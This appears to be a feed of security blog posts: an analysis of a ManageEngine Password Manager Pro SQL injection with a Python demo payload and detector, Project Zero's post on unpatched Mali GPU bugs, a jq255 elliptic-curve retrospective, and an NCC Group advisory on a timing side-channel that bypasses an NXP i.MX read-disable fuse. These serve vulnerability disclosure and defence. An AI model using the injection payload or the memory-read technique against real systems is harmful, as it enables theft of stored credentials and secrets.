An SQL injection vulnerability exists in Password Manager Pro. The vulnerability is due to a lack of sanitization of the name of the resource type in the Java class AutoLogonHelperUtil. The AutoLogonHelperUtil class is used by several controller classes, such as AutologonController and PasswordViewController, to construct a partial SQL statement related to the query for existing resource types. For example, if a user clicks the menu “Connections” on the web admin interface, a request will be sent to the “AutoLogonPasswords.ec” endpoint, and the includeView() method of the ViewProcessorServlet class is called. The includeView() method will use the AutologonController class to handle the request. The AutologonController class is derived from the SqlViewController class, and its updateViewModel() method is called to process the request. The updateViewModel() method will first call the initializeSQL() method to get an SQL statement. It then calls the getAsTableModel() method of the SQLQueryAPI class to execute the SQL statement.

In the initializeSQL() method, it will call the getSQLString() method of the AutologonController class to get the SQL statement, which will invoke the getFilledString() method of the TemplateAPI class. In the getFilledString() method, it will call the getVariableValue() method of the AutologonController. The getVariableValue() method will use the getOSTypeCriteriaForView() method of the AutoLogonHelperUtil class to construct a partial SQL statement. The getOSTypeCriteriaForView() will call the getOSTypeCriteria() method, which uses getOSTypeList() to read all resource types from the database. It then uses these resource types to build a partial SQL statement as below:

PTRX_OSTYPE in ( <resource type 1>, <resource type 2>, ..., <resource type n> )

where <resource type n> represents a resource type name queried from a database by the getOSTypeList() method. Then, this partial SQL statement will be returned to getOSTypeCriteriaForView() and then be returned to the getFilledString(). The getFilledString() will use this partial SQL statement to generate the final complete SQL statement and return it back to getSQLString().

However, the getOSTypeCriteria() method of the AutoLogonHelperUtil class does not sanitize the name of the resource type (returned from getOSTypeList()) for SQL injection characters before using it to create a partial SQL statement. An attacker can therefore first add a new resource type (or edit an existing resource type) with a crafted resource type name containing a malicious SQL command, and then click a menu such as “Connections” to invoke the methods of the AutoLogonHelperUtil class which will use the malicious resource type name to construct a SQL statement. This could trigger the execution of the injected SQL command.
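
A minimal sketch of the flaw described above, using an in-memory SQLite database rather than the product's actual backend (all table and column names other than PTRX_OSTYPE are hypothetical):

```python
import sqlite3

# Hypothetical stand-in schema: a resources table and a table holding secrets.
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE resources (name TEXT, PTRX_OSTYPE TEXT)")
con.execute("CREATE TABLE passwords (secret TEXT)")
con.execute("INSERT INTO resources VALUES ('host1', 'Windows')")
con.execute("INSERT INTO passwords VALUES ('hunter2')")

def build_query(os_type_names):
    # Mirrors the behavior described for getOSTypeCriteria(): resource type
    # names read back from the database are quoted and concatenated into the
    # statement without sanitization.
    quoted = ", ".join("'%s'" % n for n in os_type_names)
    return "SELECT name FROM resources WHERE PTRX_OSTYPE in ( %s )" % quoted

# A crafted resource type name, stored earlier (e.g. via AddResourceType.ve),
# breaks out of the string literal and injects arbitrary SQL.
crafted = build_query(["Windows') UNION SELECT secret FROM passwords --"])
rows = con.execute(crafted).fetchall()
print(crafted)
print(rows)
```

The injected UNION pulls data from an unrelated table into the result set, which is exactly the kind of effect the report describes when the malicious resource type name is later used to build the statement.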

A remote authenticated attacker can exploit the vulnerability by sending a crafted request to the target server. Successful exploitation could lead to arbitrary SQL code execution in the security context of the database service, which runs with SYSTEM privileges.

Detection Guidance

To detect an attack exploiting this vulnerability, the detection device must monitor and parse traffic on the ports listed above. Note that the traffic is encrypted via HTTPS and should be decrypted before performing the following steps.

The detection device must inspect HTTP POST requests to a Request-URI containing the following string:

        /AddResourceType.ve

If found, the detection device must inspect each part of the multipart/form-data body of the request. In each part, the detection device must search for the Content-Disposition header and check whether its name parameter has the value “resourceType”. If found, the detection device must continue to inspect the data carried in this multipart/form-data part to see if it contains the single-quote character “' (\x27)”. If found, the traffic should be considered malicious and an attack exploiting this vulnerability is likely underway. An example of a malicious request is shown below:

Additional notes:

• The string matching for the Request-URI and “POST” should be performed in a case-sensitive manner, while other string matching like “name”, “resourceType” and “Content-Disposition” should be performed in a case-insensitive manner.
• The Request-URI may be URL encoded and should be decoded before applying the detection guidance.
• It is possible for the single quote “' (\x27)” to occur naturally in a resource type name, resulting in false positives; in normal cases, however, the likelihood should be low.
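
The detection steps above can be sketched as follows (illustrative only; this assumes the HTTPS traffic has already been decrypted and the request reassembled):

```python
import re

def looks_malicious(method, request_uri, content_type, body):
    # "POST" and the Request-URI match case-sensitively.
    if method != "POST" or "/AddResourceType.ve" not in request_uri:
        return False
    # The boundary comes from the Content-Type header line (case-insensitive).
    m = re.search(r"boundary=([^;]+)", content_type, re.IGNORECASE)
    if not m:
        return False
    for part in body.split("--" + m.group(1).strip()):
        headers, _, data = part.partition("\r\n\r\n")
        # The header name and the name parameter match case-insensitively.
        if re.search(r'content-disposition:[^\r\n]*name="resourceType"',
                     headers, re.IGNORECASE):
            if "\x27" in data:  # the single-quote character
                return True
    return False

# Hypothetical example request body with a crafted resourceType part.
body = ('------x\r\n'
        'Content-Disposition: form-data; name="resourceType"\r\n\r\n'
        "Win') UNION SELECT 1 --\r\n"
        '------x--')
print(looks_malicious("POST", "/AddResourceType.ve",
                      "multipart/form-data; boundary=----x", body))
```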

Conclusion

ManageEngine patched this and other SQL injections in September. Interestingly, the patch for PAM360 came a day after the patches for Password Manager Pro and Access Manager Plus. The vendor offers no other workarounds. Applying these updates is the only way to fully protect yourself from these bugs.

Special thanks to Justin Hung and Dusan Stevanovic of the Trend Micro Research Team for providing such a thorough analysis of this vulnerability. For an overview of Trend Micro Research services please visit http://go.trendmicro.com/tis/.

The threat research team will be back with other great vulnerability analysis reports in the future. Until then, follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.

CVE-2022-40300: SQL Injection in ManageEngine Privileged Access Management

Mind the Gap

22 November 2022 at 21:05

By Ian Beer, Project Zero

Note: The vulnerabilities discussed in this blog post (CVE-2022-33917) are fixed by the upstream vendor, but at the time of publication, these fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo and others). Devices with a Mali GPU are currently vulnerable. 

Introduction

In June 2022, Project Zero researcher Maddie Stone gave a talk at FirstCon22 titled 0-day In-the-Wild Exploitation in 2022…so far. A key takeaway was that approximately 50% of the observed 0-days in the first half of 2022 were variants of previously patched vulnerabilities. This finding is consistent with our understanding of attacker behavior: attackers will take the path of least resistance, and as long as vendors don't consistently perform thorough root-cause analysis when fixing security vulnerabilities, it will continue to be worth investing time in trying to revive known vulnerabilities before looking for novel ones.

The presentation discussed an in-the-wild exploit targeting the Pixel 6 and leveraging CVE-2021-39793, a vulnerability in the ARM Mali GPU driver used by a large number of other Android devices. ARM's advisory described the vulnerability as:

Title: Mali GPU Kernel Driver may elevate CPU RO pages to writable

CVE: CVE-2022-22706 (also reported in CVE-2021-39793)

Date of issue: 6th January 2022

Impact: A non-privileged user can get a write access to read-only memory pages [sic].

The week before FirstCon22, Maddie gave an internal preview of her talk. Inspired by the description of an in-the-wild vulnerability in low-level memory management code, fellow Project Zero researcher Jann Horn started auditing the ARM Mali GPU driver. Over the next three weeks, Jann found five more exploitable vulnerabilities (2325, 2327, 2331, 2333, 2334).

Taking a closer look

One of these issues (2334) led to kernel memory corruption, one (2331) led to physical memory addresses being disclosed to userspace, and the remaining three (2325, 2327, 2333) led to a physical page use-after-free condition. These would enable an attacker to continue to read and write physical pages after they had been returned to the system.

For example, by forcing the kernel to reuse these pages as page tables, an attacker with native code execution in an app context could gain full access to the system, bypassing Android's permissions model and allowing broad access to user data.

Anecdotally, we heard from multiple sources that the Mali issues we had reported collided with vulnerabilities available in the 0-day market, and we even saw one public reference:

@ProjectZeroBugs: “Arm Mali: driver exposes physical addresses to unprivileged userspace”

@jgrusko (replying to @ProjectZeroBugs): “RIP the feature that was there forever and nobody wanted to report :)”

The "Patch gap" is for vendors, too

We reported these five issues to ARM when they were discovered between June and July 2022. ARM fixed the issues promptly in July and August 2022, disclosing them as security issues on their Arm Mali Driver Vulnerabilities page (assigning CVE-2022-36449) and publishing the patched driver source on their public developer website.

In line with our 2021 disclosure policy update we then waited an additional 30 days before derestricting our Project Zero tracker entries. Between late August and mid-September 2022 we derestricted these issues in the public Project Zero tracker: 2325, 2327, 2331, 2333, 2334.

When time permits and as an additional check, we test the effectiveness of the patches that the vendor has provided. This sometimes leads to follow-up bug reports where a patch is incomplete or a variant is discovered (for a recently compiled list of examples, see the first table in this blogpost), and sometimes we discover the fix isn't there at all.

In this case we discovered that all of our test devices which used Mali are still vulnerable to these issues. CVE-2022-36449 is not mentioned in any downstream security bulletins.

Conclusion

Just as users are recommended to patch as quickly as they can once a release containing security updates is available, so the same applies to vendors and companies. Minimizing the "patch gap" as a vendor in these scenarios is arguably more important, as end users (or other vendors downstream) are blocking on this action before they can receive the security benefits of the patch.

Companies need to remain vigilant, follow upstream sources closely, and do their best to provide complete patches to users as soon as possible.

A jq255 Elliptic Curve Specification, and a Retrospective

21 November 2022 at 16:38

First things first: there is now a specification for the jq255e and jq255s elliptic curves; it is published on the C2SP initiative and is formally in (draft) version 0.0.1: https://github.com/C2SP/C2SP/blob/main/jq255.md

The jq255e and jq255s groups are prime-order groups appropriate for building cryptographic protocols, and based on elliptic curves. These curves are from the large class of double-odd curves and their specific representation and formulas are described in particular in a paper I wrote this summer: https://eprint.iacr.org/2022/1052. In a nutshell, their advantages, compared to other curves of similar security levels, are the following:

  • They have prime order; there is no cofactor to deal with, unlike plain twisted Edwards curves such as Curve25519. They offer the same convenience for protocol building as other prime order groups such as ristretto255.
  • Performance is good; cost of operations on curve points is similar to that of twisted Edwards curves, or even somewhat faster. This is true on both large systems (servers, laptops, smartphones) and small and constrained hardware (microcontrollers). On top of that, jq255e (specifically) gets a performance boost for some operations (multiplication of a point by a full-width scalar) thanks to its internal endomorphism.
  • Signatures are short; digital signatures have size only 48 bytes instead of the usual 64 bytes of Ed25519 signatures, or of ECDSA over P-256 or secp256k1. This is not a new method, but the application of a technique that has been known since the late 1980s and was overlooked for unclear reasons. The reduction in size also makes verification faster, which is a nice side effect.
  • Implementation is simple; the formulas are straightforward and complete, and the point decompression only requires a square root computation in a finite field, without needing the combined square-root-and-inversion used in ristretto255.

The point of having a specification (as opposed to a research paper) is to provide a practical and unambiguous reference that carefully delineates potential pitfalls, and properly defines the exact encoding rules so that interoperability is achieved. Famously, Curve25519 was not specified in that way, and implementations tried to copy each other, though with some subtle differences that still plague the whole ecosystem. By writing a specification that defines and enforces canonical encodings everywhere, along with a reference implementation (in Python), I am trying to avoid that kind of suboptimal outcome. In jq255 curves, any public key, private key or signature value has a single valid representation as a fixed-size sequence of bytes, and all decoding operations duly reject any input that does not follow such a representation.

The specification is currently a “draft” (i.e. its version starts with “0”). It is meant to gather comments. As per the concept of C2SP, the specification is published as a GitHub repository, so that comments and modifications can be proposed by anybody, using the tools of software development (issues, pull requests, versioning…). It is my hope that these curves gain some traction and help avoid some problems that I still encounter regularly in practical uses of elliptic curve cryptography (in particular related to the non-trivial cofactor of twisted Edwards curves).


This specification is the occasion, for me, to look back at the research I have done in the area of elliptic curve cryptography over the past few years. The output of that research can be summarized by the list of corresponding papers, all of which have been pushed to the Cryptology ePrint Archive:

The following trends can be detected:

  • All these papers are about elliptic curves as “generic groups” for which the discrete logarithm problem is believed hard. I did not pursue research (or, more accurately, I found nothing worth publishing) in the area of pairing-friendly elliptic curves, which are special curves with extra properties that enable very nifty functionalities (notably BLS signatures).
  • I always try to achieve a practical benefit in applications, such as making things run faster, or use shorter encodings, with some emphasis on small software embedded systems (i.e. microcontrollers using a small 32-bit CPU such as the ARM Cortex M0+). Small embedded systems tend to be a lot more constrained in resources, and sensitive to optimizations in size and speed, than large servers where CPU power is plentiful and the cost of cryptography in an application is mostly negligible. All papers include links to corresponding open-source implementations that illustrate the application of the described techniques.
  • Whenever possible, I try to explore interoperable solutions; the inertia of already deployed systems is a tremendous force that cannot be dismissed offhandedly, and it is worth investigating ways to apply possible optimizations in the implementation of existing protocols such as EdDSA or ECDSA signatures, even if better solutions could be designed (such as jq255 curves and their signatures).

The first paper in the list above defines a prime-order elliptic curve called Curve9767. The main idea is to use a field extension. Elliptic curves are defined over a (finite) field, where all computations are performed. Usually, we work over the field of integers modulo a given big prime, and we choose the prime such that computations in that field are efficient (for instance, Curve25519 uses the prime 2^255-19). In all generality, finite fields have order p^m for some prime p (the “field characteristic”) and integer m ≥ 1 (the “extension degree”); for a given total field size (at least 2^250 or so, if we want to claim “128-bit security”), the two ends of the spectrum are m = 1 (the field has order p, as is the case for Curve25519 or P-256) and p = 2 (the field has order 2^m, as is used in some standard NIST curves such as K-233; more on that later on). Situations “in between”, with a small-ish p still quite greater than 2, are not well explored, and have some potential security issues that must be carefully avoided (e.g. the degree m should not admit too small a prime divisor). Curve9767 uses precisely such an intermediate field, with p = 9767 and m = 19. This field happens to be a sweet optimization spot specifically on the ARM Cortex M0+ CPU, yielding good performance, in particular for computing divisions in the field. However, implementations on other architectures (including the slightly larger ARM Cortex M4 microcontroller) yielded only disappointing performance. The experience gathered in that research was not lost; I could reuse it for ecGFp5, whose field uses p = 2^64-2^32+1 and m = 5; this is a specialized curve meant for virtual machines with zero-knowledge proofs (e.g. the Miden VM).

Double-odd elliptic curves are a category of curves that had been somewhat neglected previously. Most “classic” research on elliptic curves focused on curves with a prime order, since a prime-order group is what is needed to build cryptographic functionalities such as key exchange (with Diffie-Hellman). When a curve order is equal to rh, for some prime r and an integer h > 1 (h is then called the “cofactor”), protocols built on the curve must take some extra care to avoid issues with the cofactor. Not all protocols were careful enough in practice. Montgomery curves, later reinterpreted as twisted Edwards curves, have a non-trivial cofactor (h is always a multiple of 4 for such curves). Sometimes, the cofactor’s deleterious effects can be absorbed at relatively low cost at the protocol level, but this always requires some extra analysis. Twisted Edwards curves, in particular, offer very good performance with simple and complete formulas (no special case to handle, and this is a very good thing, especially for avoiding side-channel attacks on implementations), but their simplicity is obtained at the cost of pushing some complexity into the protocol. Twisted Edwards curves with cofactor h = 4 or 8 can be turned into convenient prime-order groups, thereby voiding the cofactor issues, through the Decaf/Ristretto construction; this is how the ristretto255 group is defined, over the twisted Edwards Curve25519. With double-odd curves, I explored an “intermediate” case of curves with cofactor h = 2, over which a prime-order group can be built with similar techniques. I recently reinterpreted such curves as a sub-case of an equation type known as the Jacobi quartic, and that finally yielded a prime-order group with all the security and convenience that can be achieved with ristretto255, albeit with somewhat simpler formulas (especially for decoding and encoding points) and slightly better performance. 
That result was worth describing as a practical specification so that it may be deployed in applications, hence the jq255 document and reference implementation with which I started this present blog post.

Another way to handle cofactor issues is through a validation step, to detect and reject points which are not in the proper prime-order subgroup. This can be done at the cost of a multiplication by the subgroup order (denoted r above), which is simple enough to implement, but expensive. In the case of curves with cofactor 4 or 8, a faster technique is possible, which halves that cost. This paper was meant mostly in the context of FROST signatures, where such validation is made mandatory (for the Ed25519 cipher suite). Even so, this is still expensive, and real prime-order groups such as ristretto255 (or, of course, the jq255 curves) are preferable.

Some of my elliptic curve research was yet one level higher, i.e. in the protocols, and specifically in the handling of signatures. The core principle of signatures on prime order groups was described by Schnorr in the late 1980s; for unfortunate patent-related reasons, a rather clunky derived construction known as DSA was standardized by NIST, and adapted to elliptic curves under the name ECDSA. In 2012, EdDSA signatures were defined, using the original Schnorr scheme, applied to twisted Edwards curves; when the curve is Curve25519 (a reinterpretation, with a change of variables, of a Montgomery curve defined in 2006), the result is called Ed25519. The verification of an ECDSA or EdDSA signature is relatively expensive; an optimization technique for this step, by Antipa et al, was known since 2005, but it relied on a preparatory step which was complicated to implement and whose cost tended to cancel the gains from the optimization technique. That preparatory step could be described as a case of lattice basis reduction in dimension two, with an algorithm from Lagrange, dating back to the 18th century (the roots of cryptographic science are deep). In 2020, I described a much faster, binary version of Lagrange’s algorithm, allowing non-negligible gains in the performance of signature verification, even for fast curves such as Curve25519.
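
The dimension-two lattice reduction step mentioned above can be sketched with the classical Lagrange (Gauss) algorithm; note this is the textbook version, not the faster binary variant from the 2020 paper, and the example lattice is arbitrary:

```python
def lagrange_reduce(u, v):
    """Lagrange (Gauss) reduction of a dimension-2 lattice basis.

    Classical textbook algorithm (not the binary variant from the paper);
    it returns a reduced basis whose first vector is a shortest nonzero
    vector of the lattice generated by u and v.
    """
    def dot(a, b):
        return a[0] * b[0] + a[1] * b[1]

    while True:
        if dot(u, u) > dot(v, v):
            u, v = v, u  # keep u as the shorter vector
        # Size-reduce v against u by subtracting the nearest integer multiple.
        q = round(dot(u, v) / dot(u, u))
        if q == 0:
            return u, v
        v = (v[0] - q * u[0], v[1] - q * u[1])

# Example: reduce the lattice generated by (1, 27) and (0, 100).
u, v = lagrange_reduce((1, 27), (0, 100))
print(u, v)
```

In the signature-verification setting, the input basis is built from the group order and a scalar extracted from the signature; the short output vectors are what allow one full-width scalar multiplication to be split into two half-width ones.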

ECDSA signatures, on a standard curve with 128-bit security (e.g. NIST’s P-256, or the secp256k1 curve used in many blockchain systems), have size 64 bytes (in practice, many ECDSA signatures use an inefficient ASN.1-based encoding which makes them needlessly larger than that). Ed25519 signatures also have size 64 bytes. The signature size can be a problem, especially for protocols dealing with small embedded systems, with strict constraints on communication bandwidth. A few bits can be removed from a signature by having the verifier “guess” their value (through exhaustive search), though this increases the verification cost; this can be done for any signature scheme, but in the case of ECDSA and EdDSA, leveraging the mathematical structure of the signatures allows somewhat larger gains, to the extent that it can be practical to reduce EdDSA signatures down to 60 bytes or so. This is a very slight gain, but in some situations it can be a lifesaver. Importantly, this technique, just like the speed optimization described previously, works on plain standard signatures and does not require modifying the signature generator in any way; these are examples of “interoperable solutions”.

Last but not least, I could apply some of the ideas of double-odd curves to the case of binary curves. These are curves defined over finite fields of cardinality 2^m for some integer m. To put it in simple words, these fields are weird. Addition in these fields is XOR, so that addition and subtraction are the same thing. In such a field, 1 + 1 = 0 (because 2 = 0). Squaring and square roots are linear operations; every value is a square and has a single square root. Nothing works as it does in other fields; elliptic curves must use their own specific equation format and formulas. Nevertheless, standard curves were defined on binary fields quite early, mostly because they are amenable to very fast hardware implementations. Among the fifteen standard NIST curves, ten are binary curves (the B-* and K-* curves), whereas the five P-* curves use integers modulo a big prime p. In more modern times, binary curves are mostly neglected, for a variety of not-completely-scientific reasons, one of them being that multiplications in binary fields are quite expensive on small microcontrollers; however, such curves may be very fast on recent CPUs, and are certainly unbroken so far. Using techniques inspired by my previous work on double-odd curves (and many hours of frantic covering of hundreds of sheets of paper with scrawled calculations), I could find formulas for computing over such curves with two advantages over the previously known best formulas: they are complete (no special case for the neutral point, or for adding a point to itself), and they are faster (generic point addition in 8 field multiplications instead of 11). Applying these formulas to the standard curve K-233, I could get point multiplications by a scalar under 30k cycles on a recent x86 CPU, more than twice as fast as even the endomorphism-powered jq255e.
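
To make the “weirdness” concrete, here is a toy implementation of arithmetic in the small binary field GF(2^8), using the well-known AES reduction polynomial; real binary curves such as K-233 use much larger fields, but the same oddities already show up here:

```python
MOD = 0x11B  # x^8 + x^4 + x^3 + x + 1, the AES reduction polynomial

def gf_add(a, b):
    return a ^ b  # addition (and subtraction) in GF(2^m) is XOR

def gf_mul(a, b):
    # Carry-less "Russian peasant" multiplication, reducing modulo MOD.
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0x100:  # degree overflow: reduce by the field polynomial
            a ^= MOD
        b >>= 1
    return r

# 1 + 1 = 0, since 2 = 0 in characteristic 2.
assert gf_add(1, 1) == 0
# Squaring is linear: (a + b)^2 = a^2 + b^2.
a, b = 0x57, 0x83
assert gf_mul(gf_add(a, b), gf_add(a, b)) == gf_add(gf_mul(a, a), gf_mul(b, b))
# Every value is a square with a single square root: squaring is a bijection.
assert len({gf_mul(x, x) for x in range(256)}) == 256
print("all binary-field properties hold")
```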

A synthetic conclusion of all this is that the question of what is the “best” curve for cryptography is certainly not resolved yet. I could produce a number of optimizations in various places, and my best attempt at general-purpose, fast-everywhere curves are jq255e and jq255s, which is why I am now specifying them so that they may be applied in practical deployments in an orderly way. But some improvements are most probably still lurking somewhere within the equations, and I encourage researchers to have another look at that space.

Technical Advisory – NXP i.MX SDP_READ_DISABLE Fuse Bypass (CVE-2022-45163)

17 November 2022 at 16:00
Vendor: NXP Semiconductors
Vendor URL: https://www.nxp.com
Affected Devices: i.MX RT 101x, i.MX RT102x, i.MX RT1050/6x, i.MX 6 Family, i.MX 7 Family, i.MX8M Quad/Mini, Vybrid
Author: Jon Szymaniak <jon.szymaniak(at)nccgroup.com>
CVE: CVE-2022-45163
Advisory URL: https://community.nxp.com/t5/Known-Limitations-and-Guidelines/SDP-Read-Bypass-CVE-2022-45163/ta-p/1553565
Risk: 5.3 (CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N), 2.6 if C:L, 0.0 if C:N

Summary

NXP System-on-a-Chip (SoC) fuse configurations with the SDP READ_REGISTER operation disabled (SDP_READ_DISABLE=1) but other serial download functionality still enabled (SDP_DISABLE=0) can be abused to read memory contents in warm and cold boot attack scenarios. In lieu of an enabled SDP READ_REGISTER operation, an attacker can use a series of timed SDP WRITE_DCD commands to execute DCD CHECK_DATA operations, for which USB control transfer response times can be observed to deduce the 1 or 0 state of each successively tested bit within the targeted memory range.

Location

The affected code is located within the immutable read-only memory (ROM) used to bootstrap NXP i.MX Application Processors; it is not customer-updatable.

Impact

Any confidential assets stored in the DDR memory or non-volatile memory mapped registers (e.g. general purpose fuses) associated with the affected chipset could be more easily retrieved by an attacker with physical access to a target device.

The level of effort required to extract memory contents from affected systems without HABv4 enabled (i.e. an “open” device) may be greatly reduced, depending on the accessibility of the SDP interface. Instead of performing memory extraction through execution of malicious firmware, built-in ROM functionality can be abused.

When HABv4 is enabled (i.e. a “closed” device) NCC Group observed a limiting factor — only one DCD could be executed per boot.  The attack is still theoretically possible but requires significantly more overhead between each bit-read attempt to reset or power cycle the target; the data extraction rate becomes limited by how quickly the USB SDP interface can enumerate.

Details

NXP i.MX system-on-a-chip (SoC) devices provide a variety of security features and eFuse-based configuration options that customers can choose to enable, according to their threat model and security requirements. In systems leveraging HABv4 in a “closed” or “secure boot” configuration, software images booted via the UART or USB OTG-based Serial Download Protocol (SDP) must still pass cryptographic signature verification.

For this reason (and based upon NCC Group’s observations during security assessments), some NXP customers may opt to leave the Serial Download Protocol (SDP) boot mode enabled in order to initially bootstrap platforms during manufacturing and/or to execute diagnostic tests. (Although highly discouraged, many do not actually enable HAB due to project schedule limitations or other factors.) Such customers may use the SDP_READ_DISABLE fuse to prevent the SDP READ_REGISTER operation from being abused by a malicious party seeking to extract sensitive information from device memory in either a warm or cold boot attack.

The types of assets regarded as sensitive and requiring strong confidentiality guarantees are expected to vary based upon a variety of factors, including the product markets of NXP’s customers and the security expectations of end-users. Examples include, but are not necessarily limited to:

  • Application or protocol-layer authentication tokens
  • Cryptographic key material (not stored in dedicated hardware-backed key storage)
  • DRM or product license information
  • Personally identifiable information (PII) and end-user data including:
    • Location
    • Device usage history
    • Stored or cached multimedia captures
  • Financial or payment card data
  • Trade secrets or other sensitive intellectual property

The boot images supported by NXP i.MX processors may contain “Device Configuration Data” (DCD) sequences, consisting of a limited set of operations (see i.MX6ULLRM Rev 1, 8.7.2 Device Configuration Data). Common use-cases of DCD functionality include clock initialization, configuration of I/O interfaces needed to retrieve a boot loader, and DDR memory controller configuration. For example, DCD functionality can alleviate the need to use multiple boot stages to overcome internal SRAM size limitations; a larger U-Boot “proper” image can be booted directly from NAND instead of requiring a U-Boot SPL to first be executed from internal SRAM to configure DDR for use by the successive U-Boot stage. Oftentimes, an NXP customer can re-use the DCD settings provided in open source reference designs with few, if any, changes.

When a device boot fails, or is otherwise specifically forced, into its Serial Download Protocol (SDP) boot mode, the SDP WRITE_DCD command can be used to send a DCD to a target device to execute. Below is a sequence diagram illustrating the series of HID reports involved in performing the SDP WRITE_DCD operation. Observe that Report3 is sent by the target device upon completion of DCD execution. Note that the value t_resp represents the turnaround time from the host sending its final Report2 to the time at which it receives the Report3 response from the target device. t_exec is the amount of time that the target actually spends executing the DCD. The latter is not directly observable, but the former can be treated as an estimate of the DCD execution time, with some added overhead.

The DCD CHECK_DATA command can be used to instruct the boot ROM to read a 32-bit value at a specified address and evaluate an expression with it. The expression is defined by “mask” and “set” parameters shown in the following table.

An optional 32-bit count parameter allows this command to be used to repeatedly poll a register until one or more bits are in the desired state. An example use case might be polling “PLL locked” status bits before proceeding to further configure peripheral subsystems.
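Based on the command layout documented in the i.MX6ULLRM (tag 0xCF, big-endian length, parameter byte, address, mask, optional count), a CHECK_DATA entry can be encoded in a few lines. Note that the flag-bit positions in the parameter byte below are our simplification and should be verified against the manual before use:

```python
import struct

# DCD CHECK_DATA command: tag (0xCF), big-endian length, parameter byte,
# then 32-bit address, mask, and an optional count (see i.MX6ULLRM).
CHECK_DATA_TAG = 0xCF

def check_data(address, mask, count=None, width=4, set_flag=False, mask_flag=False):
    """Encode a single DCD CHECK_DATA command as big-endian bytes.

    width is the access size in bytes (1, 2, or 4); set_flag/mask_flag
    select the test expression variant. Flag bit positions here are an
    assumption, not authoritative.
    """
    param = width | (set_flag << 3) | (mask_flag << 4)
    body = struct.pack(">II", address, mask)
    if count is not None:
        body += struct.pack(">I", count)
    # the length field covers the 4-byte header plus the body
    header = struct.pack(">BHB", CHECK_DATA_TAG, 4 + len(body), param)
    return header + body
```

With a count, the record is 16 bytes; without one, 12.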

If the expression is true, the boot ROM moves on to the next operation in the DCD. Otherwise, it will perform up to count iterations of the test; if the iteration limit is reached, the boot ROM moves on to the next command. This operation is effectively a no-op (NOP) when a count value of zero is specified. Without a count value, the boot ROM will poll indefinitely. For further clarity, this behavior is described in the following code excerpt.
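In rough Python terms, the polling behavior looks like the sketch below (our approximation of the documented logic, not actual ROM code; read32 stands in for a 32-bit hardware read):

```python
def rom_check_data(read32, address, mask, set_flag=True, count=None):
    """Approximation of the boot ROM's CHECK_DATA handling.

    read32(address) returns the 32-bit value at `address`. With set_flag,
    the test passes when all mask bits are set; otherwise when all are clear.
    """
    def test_passes():
        value = read32(address) & mask
        return value == mask if set_flag else value == 0

    if count == 0:
        return  # a zero count makes the command a NOP
    iterations = 0
    while not test_passes():
        iterations += 1
        # with no count, poll indefinitely; otherwise give up after `count` tries
        if count is not None and iterations >= count:
            break
    # the time spent in this loop is what the attacker observes via tresp
```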

To summarize:

  • The count parameter is attacker-controlled, included in an SDP request
  • texec can be approximated by timing the Report3 response frame
  • The measured time can be used to deduce whether a bit tested via CHECK_DATA was 1 or 0

The behavior described above allows CHECK_DATA to be abused as an arbitrary memory read primitive, albeit a slow one. This is the case regardless of the SDP_READ_DISABLE=1 fuse setting, which disallows use of the SDP READ_DATA command, and therefore represents a violation of the intended security policy. Because data stored in DDR memory decays relatively slowly (as opposed to SRAM) when its controller is no longer performing refresh cycles, an attacker may be able to recover desired data from already powered-off devices (see Halderman et al.).
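To make the primitive concrete, consider probing a single bit with mask = 1 << b and set semantics: a 1-bit passes the check on the first read, while a 0-bit burns the full count iteration budget. A toy timing model (all constants hypothetical) shows how far apart the two cases land:

```python
def expected_tresp_us(bit, count, t_iter_us=40.0, t_overhead_us=5000.0):
    """Toy model of the Report3 turnaround time for one CHECK_DATA probe.

    A 1-bit satisfies the set-mask test on the first read; a 0-bit forces
    roughly `count` polling iterations before the ROM moves on. The per-
    iteration and overhead times are illustrative, not measured values.
    """
    iterations = 0 if bit == 1 else count
    return t_overhead_us + iterations * t_iter_us

# with count = 0x800 the two timing distributions are easy to separate:
fast = expected_tresp_us(1, 0x800)
slow = expected_tresp_us(0, 0x800)
```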

Leveraging CHECK_DATA as a DDR memory read primitive, NCC Group collected timing samples for a sweep of different count parameter values on an i.MX6ULL development kit. The bimodal nature of the data, shown below, indicates the feasibility of the attack for well-chosen count values. The following section summarizes a proof of concept, remarks on results, and discusses the practicality of leveraging this in an attack.

Proof of Concept

In order to evaluate the practicality of an attack, NCC Group developed an internal tool called “imemx” to perform memory readout on SDP-enabled NXP i.MX devices, supporting both the standard READ_REGISTER operation and the aforementioned timing side-channel. Given the nature of the vulnerability and the challenges of patching it, we will not be releasing this tool publicly.

Instead, the remainder of this section outlines the high-level process we followed to confirm the vulnerability and evaluate the effectiveness of its exploitation.  Note that the degree of difficulty (or lack thereof) associated with each step largely depends upon factors resulting from design, board layout, and manufacturing decisions made by the NXP customer.

Step 1: Induce Loading of Target Data into Memory

Depending upon the target system, certain (target-specific) actions may need to be performed before assets of interest are decrypted, received, or otherwise loaded into RAM.  A few examples for different types of products are presented below.

  • Powering the device on and waiting a short period of time for runtime initialization procedures to complete
  • Performing basic user interaction with the device
  • Waiting for the device to receive a configuration update via its LTE interface
  • Pairing the device with a companion mobile application via Bluetooth
  • Producing sensor stimuli that result in MQTT events being sent to a backend system

To simplify verification, we wrote a known random pattern to the first few kilobytes of the target address from within the U-Boot boot loader using commands such as mw and loadb.

Step 2: Force Device into SDP Mode

Next, the target device must be forced into its SDP mode of operation. If the device has not been configured with the “Boot from Fuses” setting, this can be achieved by asserting BOOT_MODE[1:0]=0b10 on the associated I/O pins during a warm or power-on reset. Otherwise, it is necessary to temporarily induce non-volatile storage access failures during boot to cause the target device to fail into the SDP boot mode (similar to failing open into a U-Boot console in example 1 or example 2).

For convenience, Figure 8-1 from the i.MX6ULL Reference Manual (i.MX6ULLRM) is reproduced below. Observe that the SDP boot mode is reachable via multiple highlighted flows, including the “Boot from Fuses” setting.

Step 3: Initialize DDR Controller via DCD

In order to perform a warm or cold boot attack on a device, one must first perform any initialization required to interface with the DDR memory. Typically, this is implemented via DCD or in a U-Boot SPL.  For the purposes of this proof-of-concept, we assume the requisite configuration parameters have already been extracted from another device’s non-volatile storage or over-the-air update file.  Also note that it may still be possible to leverage information from open source implementations or third-party reference designs that a product was derived from to produce usable DDR configurations in the well-documented DCD format.

Once a DCD containing sufficient initialization has been prepared (a priori), it can be written to the device using NXP’s Universal Update Utility (UUU):

$ uuu SDP: dcd -f ./target_config.imx
